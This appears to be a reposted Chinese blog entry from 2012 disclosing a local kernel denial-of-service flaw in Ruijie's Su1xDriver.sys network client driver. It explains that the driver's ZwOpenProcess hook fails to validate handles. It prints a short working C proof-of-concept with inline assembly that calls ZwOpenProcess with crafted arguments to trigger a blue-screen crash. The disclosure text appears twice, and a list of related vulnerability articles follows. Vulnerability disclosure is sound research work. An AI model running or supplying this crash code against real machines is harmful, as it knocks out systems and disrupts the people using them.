【推荐】锐捷Su1xDriver.sys 1.0.0.1 内核拒绝服务漏洞
2012-07-12 03:28
357 查看
锐捷Su1xDriver.sys 1.0.0.1 内核拒绝服务漏洞
福州大学采用了星网锐捷的上网客户端,漏洞位于其Su1xDriver.sys内核模块偏移0x1119F处。
锐捷为了保护应用层的SuService.exe,通过其内核模块Su1xDriver.sys hook了SSDT中的ZwOpenProcess函数,但在偏移0x112C0处的代理函数My_OpenProcess中未过滤传递无效句柄,直接调用PsLookupProcessByProcessId函数而导致内核拒绝服务。
蓝屏触发代码如下:
代码:
欢迎交流 :-)
福州大学采用了星网锐捷的上网客户端,漏洞位于其Su1xDriver.sys内核模块偏移0x1119F处。
锐捷为了保护应用层的SuService.exe,通过其内核模块Su1xDriver.sys hook了SSDT中的ZwOpenProcess函数,但在偏移0x112C0处的代理函数My_OpenProcess中未过滤传递无效句柄,直接调用PsLookupProcessByProcessId函数而导致内核拒绝服务。
蓝屏触发代码如下:
代码:
/* Test for RuiJie */ #include<stdio.h> #include<windows.h> HMODULE hMod; PVOID Func; int main() { hMod = LoadLibrary("ntdll.dll"); Func = GetProcAddress(hMod ,"ZwOpenProcess"); __asm{ push 0x80000000 push 0 push 0 push 0 call Func } return 0; }
欢迎交流 :-)
相关文章推荐
- WordPress存在DoS拒绝服务漏洞,推荐删除根目录下的xmlrpc.php
- PowerTool kEvP.sys<=V4.2 内核拒绝服务漏洞
- 瑞星2011、2012神马的各种内核拒绝服务漏洞
- GKR阳光版 RegFilter.sys<=2.0.00 多处内核拒绝服务漏洞
- Vista发现内核安全漏洞 可遭到拒绝服务攻击
- Microsoft Windows Vista DHCP远程拒绝服务漏洞(MS08-004)
- TL-WR340G无线路由器拒绝服务漏洞
- OpenSSH复制块远程拒绝服务漏洞--openssh-server漏洞安全加固
- ProFTPd 远程拒绝服务漏洞 (APP,缺陷)
- Linux Kernel Tracing 多个本地拒绝服务漏洞
- MySQL关系数据库系统IF查询处理远程拒绝服务漏洞
- 重大漏洞!PHP multipart/form-data头部解析远程拒绝服务漏洞
- Linux Kernel ‘call_console_drivers()’本地拒绝服务漏洞
- Linux Kernel 多个本地拒绝服务漏洞
- 【修复】PHP multipart/form-data头部解析远程拒绝服务漏洞
- Linux kernel ‘ip6_sk_dst_check’函数拒绝服务漏洞
- Apache CXF多个远程拒绝服务漏洞(CVE-2013-2160)
- Linux Kernel ‘perf’多个拒绝服务和信息泄露漏洞
- ProFTPD STAT命令远程拒绝服务攻击漏洞
- Android静态安全检测 -> 强制类型转换本地拒绝服务漏洞